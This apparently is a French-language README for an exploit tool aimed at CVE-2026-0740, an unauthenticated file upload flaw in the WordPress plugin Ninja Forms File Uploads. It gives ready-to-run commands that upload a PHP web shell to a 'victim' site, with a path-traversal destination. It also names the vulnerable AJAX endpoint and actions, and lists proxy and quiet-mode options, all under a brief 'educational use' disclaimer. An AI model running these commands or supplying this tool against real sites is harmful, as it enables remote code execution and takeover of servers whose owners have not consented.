
Ninja Forms File Uploads <= 3.3.26 - Téléversement arbitraire de fichier non authentifié
CVE-2026-0740 est une vulnérabilité de téléversement arbitraire de fichiers sans authentification affectant :
Ninja Forms File Uploads ≤ 3.3.26 (plugin WordPress)
Cette faille permet à des attaquants de téléverser des fichiers arbitraires sur le serveur sans authentification, ce qui peut mener à une exécution de code à distance (RCE).
Ce projet est fourni uniquement à des fins éducatives et de tests de sécurité autorisés.
Installer les dépendances :
pip install httpx httpx-socks
python3 CVE-2026-0740.py -t http://target.com -f shell.php
python3 CVE-2026-0740.py \
-t https://victim.com \
-f shell.php \
-d ../../../../shell.php
admin-ajax.phpPlugin : Ninja Forms File Uploads
Endpoint : /wp-admin/admin-ajax.php
Actions :
nf_fu_get_new_noncenf_fu_upload/wp-content/uploads/Ce projet est sous licence MIT — voir le fichier LICENSE pour plus de détails.
Les pull requests sont les bienvenues. Pour les changements majeurs, ouvrez d'abord une issue pour discuter de ce que vous souhaitez modifier.
| Argument | Description |
|---|
-t, --target | URL cible |
-f, --file | Fichier à téléverser |
-d, --dest | Chemin de destination (traversée de chemin) |
-x, --proxy | Proxy SOCKS5 |
-H, --headers | En-têtes personnalisés |
--timeout | Délai d'attente de la requête |
--no-color | Désactiver la sortie colorée |
-q, --quiet | Mode silencieux |
--verify-ssl | Activer la vérification SSL |